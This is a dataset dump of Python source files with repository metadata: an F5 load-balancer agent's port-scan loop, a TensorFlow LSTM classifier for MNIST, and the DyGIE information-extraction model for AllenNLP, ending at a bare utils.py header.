loop.")) self.run_daemon_loop = False self.catch_sigterm = False if self.catch_sighup: LOG.info(_LI("Agent caught SIGHUP, resetting.")) self.conf.reload_config_files() config.setup_logging() self.conf.log_opt_values(LOG, logging.DEBUG) self.catch_sighup = False return self.run_daemon_loop def _handle_sigterm(self, signum, frame): self.catch_sigterm = True if self.quitting_rpc_timeout: self.set_rpc_timeout(self.quitting_rpc_timeout) def _handle_sighup(self, signum, frame): self.catch_sighup = True def _scan_ports(self): start = time.clock() # For now get all ports, we will then check for the corresponding VLAN config on the device # Will not scale but should prove concept works, we are also using direct DB calls rather than RPC, I suspect this # is an anti pattern and done properly we should extend the RPC API to allow us to scan the LB ports all_ports = self.db.get_ports(self.context_with_session, filters={}) for port in all_ports: LOG.info( port) LOG.info(_LI("Agent port scan for port {}".format(port['id']))) network = self.db.get_network(self.context_with_session, port['network_id']) binding_levels = db_ml2.get_binding_levels(self.context_with_session.session, port['id'], self.agent_host) for binding_level in binding_levels: LOG.info(_LI("Binding level {}".format(binding_level))) # if segment bound with ml2f5 driver if binding_level.driver == 'f5ml2': segment = db_ml2.get_segment_by_id(self.context_with_session.session, binding_level.segment_id) if segment['network_type'] == 'vlan': # and type is VLAN # Get VLANs from iControl for port network and check they are bound to the correct VLAN for bigip in self.f5_driver.get_config_bigips(): folder = 'Project_' + network['tenant_id'] name = 'vlan-' + network['id'][0:10] v = bigip.net.vlans.vlan if v.exists(name=name, partition=folder): v.load(name=name, partition=folder) tag = v.tag if tag != segment['segmentation_id']: # Update VLAN tag in case of mismatch LOG.info("Updating VLAN tag was %s needs to be %s", tag, segment['segmentation_id']) v.tag = segment['segmentation_id'] v.update() LOG.info(_LI("Scan ports completed in {} seconds".format(time.clock() - start))) def loop_count_and_wait(self, start_time, port_stats): # sleep till end of polling interval elapsed = time.time() - start_time LOG.debug("F5 Agent rpc_loop - iteration:%(iter_num)d " "completed. Processed ports statistics: " "%(port_stats)s. 
Elapsed:%(elapsed).3f", {'iter_num': self.iter_num, 'port_stats': port_stats, 'elapsed': elapsed}) if elapsed < self.polling_interval: time.sleep(self.polling_interval - elapsed) else: LOG.debug("Loop iteration exceeded interval " "(%(polling_interval)s vs. %(elapsed)s)!", {'polling_interval': self.polling_interval, 'elapsed': elapsed}) self.iter_num = self.iter_num + 1 def rpc_loop(self, ): while self._check_and_handle_signal(): start = time.time() port_stats = {} try: self._scan_ports() except Exception: LOG.exception(_LE("Error while processing ports")) self.loop_count_and_wait(start, port_stats) def daemon_loop(self): # Start everything. LOG.info(_LI("Agent initialized successfully, now running... ")) signal.signal(signal.SIGTERM, self._handle_sigterm) if hasattr(signal, 'SIGHUP'): signal.signal(signal.SIGHUP, self._handle_sighup) self.rpc_loop()
8,131
484
23
1a75c8a8fd2beddcfde21f65f430272b0cbb7ae4
1,732
py
Python
lstm.py
KT12/hands_on_machine_learning
6de2292b43d7c34b6509ad61dab2da4f7ec04894
[ "MIT" ]
null
null
null
lstm.py
KT12/hands_on_machine_learning
6de2292b43d7c34b6509ad61dab2da4f7ec04894
[ "MIT" ]
null
null
null
lstm.py
KT12/hands_on_machine_learning
6de2292b43d7c34b6509ad61dab2da4f7ec04894
[ "MIT" ]
null
null
null
import tensorflow as tf
import numpy as np

tf.set_random_seed(5)

n_inputs = 28
n_neurons = 150
n_layers = 3
n_steps = 28
n_outputs = 10

learning_rate = 0.001

from tensorflow.examples.tutorials.mnist import input_data
mnist = input_data.read_data_sets("/tmp/data/")
X_test = mnist.test.images.reshape((-1, n_steps, n_inputs))
y_test = mnist.test.labels

X = tf.placeholder(tf.float32, [None, n_steps, n_inputs])
y = tf.placeholder(tf.int32, [None])

multi_cell = tf.contrib.rnn.MultiRNNCell([tf.contrib.rnn.BasicLSTMCell(num_units=n_neurons) for _ in range(3)])
outputs, states = tf.nn.dynamic_rnn(multi_cell, X, dtype=tf.float32)
top_layer_h_state = states[-1][1]
logits = tf.layers.dense(top_layer_h_state, n_outputs, name='softmax')
x_entropy = tf.nn.sparse_softmax_cross_entropy_with_logits(labels=y, logits=logits)
loss = tf.reduce_mean(x_entropy, name='loss')
optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate)
training_op = optimizer.minimize(loss)
correct = tf.nn.in_top_k(logits, y, 1)
accuracy = tf.reduce_mean(tf.cast(correct, tf.float32))

init = tf.global_variables_initializer()

states

top_layer_h_state

n_epochs = 25
batch_size = 150

with tf.Session() as sess:
    init.run()
    for epoch in range(n_epochs):
        for k in range(mnist.train.num_examples // batch_size):
            X_batch, y_batch = mnist.train.next_batch(batch_size)
            X_batch = X_batch.reshape((batch_size, n_steps, n_inputs))
            sess.run(training_op, feed_dict={X: X_batch, y: y_batch})
        acc_train = accuracy.eval(feed_dict={X: X_batch, y: y_batch})
        acc_test = accuracy.eval(feed_dict={X: X_test, y: y_test})
        print("Epoch", epoch, 'Train acc: ', acc_train, "Test acc: ", acc_test)
33.960784
111
0.732102
import tensorflow as tf
import numpy as np

tf.set_random_seed(5)

n_inputs = 28
n_neurons = 150
n_layers = 3
n_steps = 28
n_outputs = 10

learning_rate = 0.001

from tensorflow.examples.tutorials.mnist import input_data
mnist = input_data.read_data_sets("/tmp/data/")
X_test = mnist.test.images.reshape((-1, n_steps, n_inputs))
y_test = mnist.test.labels

X = tf.placeholder(tf.float32, [None, n_steps, n_inputs])
y = tf.placeholder(tf.int32, [None])

multi_cell = tf.contrib.rnn.MultiRNNCell([tf.contrib.rnn.BasicLSTMCell(num_units=n_neurons) for _ in range(3)])
outputs, states = tf.nn.dynamic_rnn(multi_cell, X, dtype=tf.float32)
top_layer_h_state = states[-1][1]
logits = tf.layers.dense(top_layer_h_state, n_outputs, name='softmax')
x_entropy = tf.nn.sparse_softmax_cross_entropy_with_logits(labels=y, logits=logits)
loss = tf.reduce_mean(x_entropy, name='loss')
optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate)
training_op = optimizer.minimize(loss)
correct = tf.nn.in_top_k(logits, y, 1)
accuracy = tf.reduce_mean(tf.cast(correct, tf.float32))

init = tf.global_variables_initializer()

states

top_layer_h_state

n_epochs = 25
batch_size = 150

with tf.Session() as sess:
    init.run()
    for epoch in range(n_epochs):
        for k in range(mnist.train.num_examples // batch_size):
            X_batch, y_batch = mnist.train.next_batch(batch_size)
            X_batch = X_batch.reshape((batch_size, n_steps, n_inputs))
            sess.run(training_op, feed_dict={X: X_batch, y: y_batch})
        acc_train = accuracy.eval(feed_dict={X: X_batch, y: y_batch})
        acc_test = accuracy.eval(feed_dict={X: X_test, y: y_test})
        print("Epoch", epoch, 'Train acc: ', acc_train, "Test acc: ", acc_test)
0
0
0
22230bd8b1f3797e8dc3f1afa43c1e2179290ce4
19,313
py
Python
dygiepp/dygie/models/dygie.py
feiLinX/SciREX
768c869af746f4a61b3d58b15897e03caa5e2d32
[ "Apache-2.0" ]
99
2020-05-04T11:07:00.000Z
2022-03-30T12:55:00.000Z
dygiepp/dygie/models/dygie.py
feiLinX/SciREX
768c869af746f4a61b3d58b15897e03caa5e2d32
[ "Apache-2.0" ]
13
2020-08-05T18:22:44.000Z
2021-05-06T21:35:05.000Z
dygiepp/dygie/models/dygie.py
feiLinX/SciREX
768c869af746f4a61b3d58b15897e03caa5e2d32
[ "Apache-2.0" ]
24
2020-07-09T13:37:42.000Z
2022-03-26T09:56:43.000Z
from os import path import logging from typing import Dict, List, Optional import copy import torch import torch.nn.functional as F from overrides import overrides from allennlp.data import Vocabulary from allennlp.common.params import Params from allennlp.models.model import Model from allennlp.modules import Seq2SeqEncoder, TextFieldEmbedder, FeedForward from allennlp.modules.span_extractors import SelfAttentiveSpanExtractor, EndpointSpanExtractor from allennlp.nn import util, InitializerApplicator, RegularizerApplicator # Import submodules. from dygie.models.coref import CorefResolver from dygie.models.ner import NERTagger from dygie.models.relation import RelationExtractor from dygie.models.events import EventExtractor from dygie.training.joint_metrics import JointMetrics logger = logging.getLogger(__name__) # pylint: disable=invalid-name @Model.register("dygie") class DyGIE(Model): """ TODO(dwadden) document me. Parameters ---------- vocab : ``Vocabulary`` text_field_embedder : ``TextFieldEmbedder`` Used to embed the ``text`` ``TextField`` we get as input to the model. context_layer : ``Seq2SeqEncoder`` This layer incorporates contextual information for each word in the document. feature_size: ``int`` The embedding size for all the embedded features, such as distances or span widths. submodule_params: ``TODO(dwadden)`` A nested dictionary specifying parameters to be passed on to initialize submodules. max_span_width: ``int`` The maximum width of candidate spans. lexical_dropout: ``int`` The probability of dropping out dimensions of the embedded text. initializer : ``InitializerApplicator``, optional (default=``InitializerApplicator()``) Used to initialize the model parameters. regularizer : ``RegularizerApplicator``, optional (default=``None``) If provided, will be used to calculate the regularization penalty during training. display_metrics: ``List[str]``. A list of the metrics that should be printed out during model training. """ @overrides def forward(self, text, spans, ner_labels, coref_labels, relation_labels, trigger_labels, argument_labels, metadata): """ TODO(dwadden) change this. """ # For co-training on Ontonotes, need to change the loss weights depending on the data coming # in. This is a hack but it will do for now. if self._co_train: if self.training: dataset = [entry["dataset"] for entry in metadata] assert len(set(dataset)) == 1 dataset = dataset[0] assert dataset in ["ace", "ontonotes"] if dataset == "ontonotes": self._loss_weights = dict(coref=1, ner=0, relation=0, events=0) else: self._loss_weights = self._permanent_loss_weights # This assumes that there won't be any co-training data in the dev and test sets, and that # coref propagation will still happen even when the coref weight is set to 0. else: self._loss_weights = self._permanent_loss_weights # In AllenNLP, AdjacencyFields are passed in as floats. This fixes it. relation_labels = relation_labels.long() argument_labels = argument_labels.long() # If we're doing Bert, get the sentence class token as part of the text embedding. This will # break if we use Bert together with other embeddings, but that won't happen much. 
if "bert-offsets" in text: offsets = text["bert-offsets"] sent_ix = torch.zeros(offsets.size(0), device=offsets.device, dtype=torch.long).unsqueeze(1) padded_offsets = torch.cat([sent_ix, offsets], dim=1) text["bert-offsets"] = padded_offsets padded_embeddings = self._text_field_embedder(text) cls_embeddings = padded_embeddings[:, 0, :] text_embeddings = padded_embeddings[:, 1:, :] else: text_embeddings = self._text_field_embedder(text) cls_embeddings = torch.zeros([text_embeddings.size(0), text_embeddings.size(2)], device=text_embeddings.device) text_embeddings = self._lexical_dropout(text_embeddings) # Shape: (batch_size, max_sentence_length) text_mask = util.get_text_field_mask(text).float() sentence_group_lengths = text_mask.sum(dim=1).long() sentence_lengths = 0*text_mask.sum(dim=1).long() for i in range(len(metadata)): sentence_lengths[i] = metadata[i]["end_ix"] - metadata[i]["start_ix"] for k in range(sentence_lengths[i], sentence_group_lengths[i]): text_mask[i][k] = 0 max_sentence_length = sentence_lengths.max().item() # TODO(Ulme) Speed this up by tensorizing new_text_embeddings = torch.zeros([text_embeddings.shape[0], max_sentence_length, text_embeddings.shape[2]], device=text_embeddings.device) for i in range(len(new_text_embeddings)): new_text_embeddings[i][0:metadata[i]["end_ix"] - metadata[i]["start_ix"]] = text_embeddings[i][metadata[i]["start_ix"]:metadata[i]["end_ix"]] #max_sent_len = max(sentence_lengths) #the_list = [list(k+metadata[i]["start_ix"] if k < max_sent_len else 0 for k in range(text_embeddings.shape[1])) for i in range(len(metadata))] #import ipdb; ipdb.set_trace() #text_embeddings = torch.gather(text_embeddings, 1, torch.tensor(the_list, device=text_embeddings.device).unsqueeze(2).repeat(1, 1, text_embeddings.shape[2])) text_embeddings = new_text_embeddings # Only keep the text embeddings that correspond to actual tokens. # text_embeddings = text_embeddings[:, :max_sentence_length, :].contiguous() text_mask = text_mask[:, :max_sentence_length].contiguous() # Shape: (batch_size, max_sentence_length, encoding_dim) contextualized_embeddings = self._lstm_dropout(self._context_layer(text_embeddings, text_mask)) assert spans.max() < contextualized_embeddings.shape[1] if self._attentive_span_extractor is not None: # Shape: (batch_size, num_spans, emebedding_size) attended_span_embeddings = self._attentive_span_extractor(text_embeddings, spans) # Shape: (batch_size, num_spans) span_mask = (spans[:, :, 0] >= 0).float() # SpanFields return -1 when they are used as padding. As we do # some comparisons based on span widths when we attend over the # span representations that we generate from these indices, we # need them to be <= 0. This is only relevant in edge cases where # the number of spans we consider after the pruning stage is >= the # total number of spans, because in this case, it is possible we might # consider a masked span. 
# Shape: (batch_size, num_spans, 2) spans = F.relu(spans.float()).long() # Shape: (batch_size, num_spans, 2 * encoding_dim + feature_size) endpoint_span_embeddings = self._endpoint_span_extractor(contextualized_embeddings, spans) if self._attentive_span_extractor is not None: # Shape: (batch_size, num_spans, emebedding_size + 2 * encoding_dim + feature_size) span_embeddings = torch.cat([endpoint_span_embeddings, attended_span_embeddings], -1) else: span_embeddings = endpoint_span_embeddings # TODO(Ulme) try normalizing span embeddeings #span_embeddings = span_embeddings.abs().sum(dim=-1).unsqueeze(-1) # Make calls out to the modules to get results. output_coref = {'loss': 0} output_ner = {'loss': 0} output_relation = {'loss': 0} output_events = {'loss': 0} # Prune and compute span representations for coreference module if self._loss_weights["coref"] > 0 or self._coref.coref_prop > 0: output_coref, coref_indices = self._coref.compute_representations( spans, span_mask, span_embeddings, sentence_lengths, coref_labels, metadata) # Prune and compute span representations for relation module if self._loss_weights["relation"] > 0 or self._relation.rel_prop > 0: output_relation = self._relation.compute_representations( spans, span_mask, span_embeddings, sentence_lengths, relation_labels, metadata) # Propagation of global information to enhance the span embeddings if self._coref.coref_prop > 0: # TODO(Ulme) Implement Coref Propagation output_coref = self._coref.coref_propagation(output_coref) span_embeddings = self._coref.update_spans(output_coref, span_embeddings, coref_indices) if self._relation.rel_prop > 0: output_relation = self._relation.relation_propagation(output_relation) span_embeddings = self.update_span_embeddings(span_embeddings, span_mask, output_relation["top_span_embeddings"], output_relation["top_span_mask"], output_relation["top_span_indices"]) # Make predictions and compute losses for each module if self._loss_weights['ner'] > 0: output_ner = self._ner( spans, span_mask, span_embeddings, sentence_lengths, ner_labels, metadata) if self._loss_weights['coref'] > 0: try : output_coref = self._coref.predict_labels(output_coref, metadata) except : output_coref = {} if self._loss_weights['relation'] > 0: output_relation = self._relation.predict_labels(relation_labels, output_relation, metadata) if self._loss_weights['events'] > 0: # Make the trigger embeddings the same size as the argument embeddings to make # propagation easier. if self._events._span_prop._n_span_prop > 0: trigger_embeddings = contextualized_embeddings.repeat(1, 1, 2) trigger_widths = torch.zeros([trigger_embeddings.size(0), trigger_embeddings.size(1)], device=trigger_embeddings.device, dtype=torch.long) trigger_width_embs = self._endpoint_span_extractor._span_width_embedding(trigger_widths) trigger_width_embs = trigger_width_embs.detach() trigger_embeddings = torch.cat([trigger_embeddings, trigger_width_embs], dim=-1) else: trigger_embeddings = contextualized_embeddings output_events = self._events( text_mask, trigger_embeddings, spans, span_mask, span_embeddings, cls_embeddings, sentence_lengths, output_ner, trigger_labels, argument_labels, ner_labels, metadata) if "loss" not in output_coref: output_coref["loss"] = 0 if "loss" not in output_relation: output_relation["loss"] = 0 # TODO(dwadden) just did this part. 
loss = (self._loss_weights['coref'] * output_coref['loss'] + self._loss_weights['ner'] * output_ner['loss'] + self._loss_weights['relation'] * output_relation['loss'] + self._loss_weights['events'] * output_events['loss']) output_dict = dict(coref=output_coref, relation=output_relation, ner=output_ner, events=output_events) output_dict['loss'] = loss # Check to see if event predictions are globally compatible (argument labels are compatible # with NER tags and trigger tags). # if self._loss_weights["ner"] > 0 and self._loss_weights["events"] > 0: # decoded_ner = self._ner.decode(output_dict["ner"]) # decoded_events = self._events.decode(output_dict["events"]) # self._joint_metrics(decoded_ner, decoded_events) return output_dict @overrides def decode(self, output_dict: Dict[str, torch.Tensor]): """ Converts the list of spans and predicted antecedent indices into clusters of spans for each element in the batch. Parameters ---------- output_dict : ``Dict[str, torch.Tensor]``, required. The result of calling :func:`forward` on an instance or batch of instances. Returns ------- The same output dictionary, but with an additional ``clusters`` key: clusters : ``List[List[List[Tuple[int, int]]]]`` A nested list, representing, for each instance in the batch, the list of clusters, which are in turn comprised of a list of (start, end) inclusive spans into the original document. """ # TODO(dwadden) which things are already decoded? res = {} if self._loss_weights["coref"] > 0: try : res["coref"] = self._coref.decode(output_dict["coref"]) except : pass if self._loss_weights["ner"] > 0: res["ner"] = self._ner.decode(output_dict["ner"]) if self._loss_weights["relation"] > 0: res["relation"] = self._relation.decode(output_dict["relation"]) if self._loss_weights["events"] > 0: res["events"] = output_dict["events"] return res def get_metrics(self, reset: bool = False) -> Dict[str, float]: """ Get all metrics from all modules. For the ones that shouldn't be displayed, prefix their keys with an underscore. """ metrics_coref = self._coref.get_metrics(reset=reset) metrics_ner = self._ner.get_metrics(reset=reset) metrics_relation = self._relation.get_metrics(reset=reset) metrics_events = self._events.get_metrics(reset=reset) if self._loss_weights["ner"] > 0 and self._loss_weights["events"] > 0: metrics_joint = self._joint_metrics.get_metric(reset=reset) else: metrics_joint = {} # Make sure that there aren't any conflicting names. metric_names = (list(metrics_coref.keys()) + list(metrics_ner.keys()) + list(metrics_relation.keys()) + list(metrics_events.keys())) assert len(set(metric_names)) == len(metric_names) all_metrics = dict(list(metrics_coref.items()) + list(metrics_ner.items()) + list(metrics_relation.items()) + list(metrics_events.items()) + list(metrics_joint.items())) # If no list of desired metrics given, display them all. if self._display_metrics is None: return all_metrics # Otherwise only display the selected ones. res = {} for k, v in all_metrics.items(): if k in self._display_metrics: res[k] = v else: new_k = "_" + k res[new_k] = v return res
47.68642
166
0.622741
from os import path import logging from typing import Dict, List, Optional import copy import torch import torch.nn.functional as F from overrides import overrides from allennlp.data import Vocabulary from allennlp.common.params import Params from allennlp.models.model import Model from allennlp.modules import Seq2SeqEncoder, TextFieldEmbedder, FeedForward from allennlp.modules.span_extractors import SelfAttentiveSpanExtractor, EndpointSpanExtractor from allennlp.nn import util, InitializerApplicator, RegularizerApplicator # Import submodules. from dygie.models.coref import CorefResolver from dygie.models.ner import NERTagger from dygie.models.relation import RelationExtractor from dygie.models.events import EventExtractor from dygie.training.joint_metrics import JointMetrics logger = logging.getLogger(__name__) # pylint: disable=invalid-name @Model.register("dygie") class DyGIE(Model): """ TODO(dwadden) document me. Parameters ---------- vocab : ``Vocabulary`` text_field_embedder : ``TextFieldEmbedder`` Used to embed the ``text`` ``TextField`` we get as input to the model. context_layer : ``Seq2SeqEncoder`` This layer incorporates contextual information for each word in the document. feature_size: ``int`` The embedding size for all the embedded features, such as distances or span widths. submodule_params: ``TODO(dwadden)`` A nested dictionary specifying parameters to be passed on to initialize submodules. max_span_width: ``int`` The maximum width of candidate spans. lexical_dropout: ``int`` The probability of dropping out dimensions of the embedded text. initializer : ``InitializerApplicator``, optional (default=``InitializerApplicator()``) Used to initialize the model parameters. regularizer : ``RegularizerApplicator``, optional (default=``None``) If provided, will be used to calculate the regularization penalty during training. display_metrics: ``List[str]``. A list of the metrics that should be printed out during model training. """ def __init__(self, vocab: Vocabulary, text_field_embedder: TextFieldEmbedder, context_layer: Seq2SeqEncoder, modules, # TODO(dwadden) Add type. feature_size: int, max_span_width: int, loss_weights: Dict[str, int], lexical_dropout: float = 0.2, lstm_dropout: float = 0.4, use_attentive_span_extractor: bool = False, co_train: bool = False, initializer: InitializerApplicator = InitializerApplicator(), regularizer: Optional[RegularizerApplicator] = None, display_metrics: List[str] = None) -> None: super(DyGIE, self).__init__(vocab, regularizer) self._text_field_embedder = text_field_embedder self._context_layer = context_layer self._loss_weights = loss_weights self._permanent_loss_weights = copy.deepcopy(self._loss_weights) # Need to add this line so things don't break. TODO(dwadden) sort out what's happening. modules = Params(modules) self._coref = CorefResolver.from_params(vocab=vocab, feature_size=feature_size, params=modules.pop("coref")) self._ner = NERTagger.from_params(vocab=vocab, feature_size=feature_size, params=modules.pop("ner")) self._relation = RelationExtractor.from_params(vocab=vocab, feature_size=feature_size, params=modules.pop("relation")) self._events = EventExtractor.from_params(vocab=vocab, feature_size=feature_size, params=modules.pop("events")) # Make endpoint span extractor. 
self._endpoint_span_extractor = EndpointSpanExtractor(context_layer.get_output_dim(), combination="x,y", num_width_embeddings=max_span_width, span_width_embedding_dim=feature_size, bucket_widths=False) if use_attentive_span_extractor: self._attentive_span_extractor = SelfAttentiveSpanExtractor( input_dim=text_field_embedder.get_output_dim()) else: self._attentive_span_extractor = None self._max_span_width = max_span_width self._display_metrics = display_metrics if lexical_dropout > 0: self._lexical_dropout = torch.nn.Dropout(p=lexical_dropout) else: self._lexical_dropout = lambda x: x # Do co-training if we're training on ACE and ontonotes. self._co_train = co_train # Big gotcha: PyTorch doesn't add dropout to the LSTM's output layer. We need to do this # manually. if lstm_dropout > 0: self._lstm_dropout = torch.nn.Dropout(p=lstm_dropout) else: self._lstm_dropout = lambda x: x initializer(self) @overrides def forward(self, text, spans, ner_labels, coref_labels, relation_labels, trigger_labels, argument_labels, metadata): """ TODO(dwadden) change this. """ # For co-training on Ontonotes, need to change the loss weights depending on the data coming # in. This is a hack but it will do for now. if self._co_train: if self.training: dataset = [entry["dataset"] for entry in metadata] assert len(set(dataset)) == 1 dataset = dataset[0] assert dataset in ["ace", "ontonotes"] if dataset == "ontonotes": self._loss_weights = dict(coref=1, ner=0, relation=0, events=0) else: self._loss_weights = self._permanent_loss_weights # This assumes that there won't be any co-training data in the dev and test sets, and that # coref propagation will still happen even when the coref weight is set to 0. else: self._loss_weights = self._permanent_loss_weights # In AllenNLP, AdjacencyFields are passed in as floats. This fixes it. relation_labels = relation_labels.long() argument_labels = argument_labels.long() # If we're doing Bert, get the sentence class token as part of the text embedding. This will # break if we use Bert together with other embeddings, but that won't happen much. 
if "bert-offsets" in text: offsets = text["bert-offsets"] sent_ix = torch.zeros(offsets.size(0), device=offsets.device, dtype=torch.long).unsqueeze(1) padded_offsets = torch.cat([sent_ix, offsets], dim=1) text["bert-offsets"] = padded_offsets padded_embeddings = self._text_field_embedder(text) cls_embeddings = padded_embeddings[:, 0, :] text_embeddings = padded_embeddings[:, 1:, :] else: text_embeddings = self._text_field_embedder(text) cls_embeddings = torch.zeros([text_embeddings.size(0), text_embeddings.size(2)], device=text_embeddings.device) text_embeddings = self._lexical_dropout(text_embeddings) # Shape: (batch_size, max_sentence_length) text_mask = util.get_text_field_mask(text).float() sentence_group_lengths = text_mask.sum(dim=1).long() sentence_lengths = 0*text_mask.sum(dim=1).long() for i in range(len(metadata)): sentence_lengths[i] = metadata[i]["end_ix"] - metadata[i]["start_ix"] for k in range(sentence_lengths[i], sentence_group_lengths[i]): text_mask[i][k] = 0 max_sentence_length = sentence_lengths.max().item() # TODO(Ulme) Speed this up by tensorizing new_text_embeddings = torch.zeros([text_embeddings.shape[0], max_sentence_length, text_embeddings.shape[2]], device=text_embeddings.device) for i in range(len(new_text_embeddings)): new_text_embeddings[i][0:metadata[i]["end_ix"] - metadata[i]["start_ix"]] = text_embeddings[i][metadata[i]["start_ix"]:metadata[i]["end_ix"]] #max_sent_len = max(sentence_lengths) #the_list = [list(k+metadata[i]["start_ix"] if k < max_sent_len else 0 for k in range(text_embeddings.shape[1])) for i in range(len(metadata))] #import ipdb; ipdb.set_trace() #text_embeddings = torch.gather(text_embeddings, 1, torch.tensor(the_list, device=text_embeddings.device).unsqueeze(2).repeat(1, 1, text_embeddings.shape[2])) text_embeddings = new_text_embeddings # Only keep the text embeddings that correspond to actual tokens. # text_embeddings = text_embeddings[:, :max_sentence_length, :].contiguous() text_mask = text_mask[:, :max_sentence_length].contiguous() # Shape: (batch_size, max_sentence_length, encoding_dim) contextualized_embeddings = self._lstm_dropout(self._context_layer(text_embeddings, text_mask)) assert spans.max() < contextualized_embeddings.shape[1] if self._attentive_span_extractor is not None: # Shape: (batch_size, num_spans, emebedding_size) attended_span_embeddings = self._attentive_span_extractor(text_embeddings, spans) # Shape: (batch_size, num_spans) span_mask = (spans[:, :, 0] >= 0).float() # SpanFields return -1 when they are used as padding. As we do # some comparisons based on span widths when we attend over the # span representations that we generate from these indices, we # need them to be <= 0. This is only relevant in edge cases where # the number of spans we consider after the pruning stage is >= the # total number of spans, because in this case, it is possible we might # consider a masked span. 
# Shape: (batch_size, num_spans, 2) spans = F.relu(spans.float()).long() # Shape: (batch_size, num_spans, 2 * encoding_dim + feature_size) endpoint_span_embeddings = self._endpoint_span_extractor(contextualized_embeddings, spans) if self._attentive_span_extractor is not None: # Shape: (batch_size, num_spans, emebedding_size + 2 * encoding_dim + feature_size) span_embeddings = torch.cat([endpoint_span_embeddings, attended_span_embeddings], -1) else: span_embeddings = endpoint_span_embeddings # TODO(Ulme) try normalizing span embeddeings #span_embeddings = span_embeddings.abs().sum(dim=-1).unsqueeze(-1) # Make calls out to the modules to get results. output_coref = {'loss': 0} output_ner = {'loss': 0} output_relation = {'loss': 0} output_events = {'loss': 0} # Prune and compute span representations for coreference module if self._loss_weights["coref"] > 0 or self._coref.coref_prop > 0: output_coref, coref_indices = self._coref.compute_representations( spans, span_mask, span_embeddings, sentence_lengths, coref_labels, metadata) # Prune and compute span representations for relation module if self._loss_weights["relation"] > 0 or self._relation.rel_prop > 0: output_relation = self._relation.compute_representations( spans, span_mask, span_embeddings, sentence_lengths, relation_labels, metadata) # Propagation of global information to enhance the span embeddings if self._coref.coref_prop > 0: # TODO(Ulme) Implement Coref Propagation output_coref = self._coref.coref_propagation(output_coref) span_embeddings = self._coref.update_spans(output_coref, span_embeddings, coref_indices) if self._relation.rel_prop > 0: output_relation = self._relation.relation_propagation(output_relation) span_embeddings = self.update_span_embeddings(span_embeddings, span_mask, output_relation["top_span_embeddings"], output_relation["top_span_mask"], output_relation["top_span_indices"]) # Make predictions and compute losses for each module if self._loss_weights['ner'] > 0: output_ner = self._ner( spans, span_mask, span_embeddings, sentence_lengths, ner_labels, metadata) if self._loss_weights['coref'] > 0: try : output_coref = self._coref.predict_labels(output_coref, metadata) except : output_coref = {} if self._loss_weights['relation'] > 0: output_relation = self._relation.predict_labels(relation_labels, output_relation, metadata) if self._loss_weights['events'] > 0: # Make the trigger embeddings the same size as the argument embeddings to make # propagation easier. if self._events._span_prop._n_span_prop > 0: trigger_embeddings = contextualized_embeddings.repeat(1, 1, 2) trigger_widths = torch.zeros([trigger_embeddings.size(0), trigger_embeddings.size(1)], device=trigger_embeddings.device, dtype=torch.long) trigger_width_embs = self._endpoint_span_extractor._span_width_embedding(trigger_widths) trigger_width_embs = trigger_width_embs.detach() trigger_embeddings = torch.cat([trigger_embeddings, trigger_width_embs], dim=-1) else: trigger_embeddings = contextualized_embeddings output_events = self._events( text_mask, trigger_embeddings, spans, span_mask, span_embeddings, cls_embeddings, sentence_lengths, output_ner, trigger_labels, argument_labels, ner_labels, metadata) if "loss" not in output_coref: output_coref["loss"] = 0 if "loss" not in output_relation: output_relation["loss"] = 0 # TODO(dwadden) just did this part. 
loss = (self._loss_weights['coref'] * output_coref['loss'] + self._loss_weights['ner'] * output_ner['loss'] + self._loss_weights['relation'] * output_relation['loss'] + self._loss_weights['events'] * output_events['loss']) output_dict = dict(coref=output_coref, relation=output_relation, ner=output_ner, events=output_events) output_dict['loss'] = loss # Check to see if event predictions are globally compatible (argument labels are compatible # with NER tags and trigger tags). # if self._loss_weights["ner"] > 0 and self._loss_weights["events"] > 0: # decoded_ner = self._ner.decode(output_dict["ner"]) # decoded_events = self._events.decode(output_dict["events"]) # self._joint_metrics(decoded_ner, decoded_events) return output_dict def update_span_embeddings(self, span_embeddings, span_mask, top_span_embeddings, top_span_mask, top_span_indices): # TODO(Ulme) Speed this up by tensorizing new_span_embeddings = span_embeddings.clone() for sample_nr in range(len(top_span_mask)): for top_span_nr, span_nr in enumerate(top_span_indices[sample_nr]): if top_span_mask[sample_nr, top_span_nr] == 0 or span_mask[sample_nr, span_nr] == 0: break new_span_embeddings[sample_nr, span_nr] = top_span_embeddings[sample_nr, top_span_nr] return new_span_embeddings @overrides def decode(self, output_dict: Dict[str, torch.Tensor]): """ Converts the list of spans and predicted antecedent indices into clusters of spans for each element in the batch. Parameters ---------- output_dict : ``Dict[str, torch.Tensor]``, required. The result of calling :func:`forward` on an instance or batch of instances. Returns ------- The same output dictionary, but with an additional ``clusters`` key: clusters : ``List[List[List[Tuple[int, int]]]]`` A nested list, representing, for each instance in the batch, the list of clusters, which are in turn comprised of a list of (start, end) inclusive spans into the original document. """ # TODO(dwadden) which things are already decoded? res = {} if self._loss_weights["coref"] > 0: try : res["coref"] = self._coref.decode(output_dict["coref"]) except : pass if self._loss_weights["ner"] > 0: res["ner"] = self._ner.decode(output_dict["ner"]) if self._loss_weights["relation"] > 0: res["relation"] = self._relation.decode(output_dict["relation"]) if self._loss_weights["events"] > 0: res["events"] = output_dict["events"] return res def get_metrics(self, reset: bool = False) -> Dict[str, float]: """ Get all metrics from all modules. For the ones that shouldn't be displayed, prefix their keys with an underscore. """ metrics_coref = self._coref.get_metrics(reset=reset) metrics_ner = self._ner.get_metrics(reset=reset) metrics_relation = self._relation.get_metrics(reset=reset) metrics_events = self._events.get_metrics(reset=reset) if self._loss_weights["ner"] > 0 and self._loss_weights["events"] > 0: metrics_joint = self._joint_metrics.get_metric(reset=reset) else: metrics_joint = {} # Make sure that there aren't any conflicting names. metric_names = (list(metrics_coref.keys()) + list(metrics_ner.keys()) + list(metrics_relation.keys()) + list(metrics_events.keys())) assert len(set(metric_names)) == len(metric_names) all_metrics = dict(list(metrics_coref.items()) + list(metrics_ner.items()) + list(metrics_relation.items()) + list(metrics_events.items()) + list(metrics_joint.items())) # If no list of desired metrics given, display them all. if self._display_metrics is None: return all_metrics # Otherwise only display the selected ones. 
res = {} for k, v in all_metrics.items(): if k in self._display_metrics: res[k] = v else: new_k = "_" + k res[new_k] = v return res
3,981
0
53
665c07f5066184b2d353592c7cd71270f8ccbf8a
4,245
py
Python
utils.py
vdumoulin/espresso-shot
b8113b52e8468c659bd762f7d22243269bef3984
[ "MIT" ]
null
null
null
utils.py
vdumoulin/espresso-shot
b8113b52e8468c659bd762f7d22243269bef3984
[ "MIT" ]
null
null
null
utils.py
vdumoulin/espresso-shot
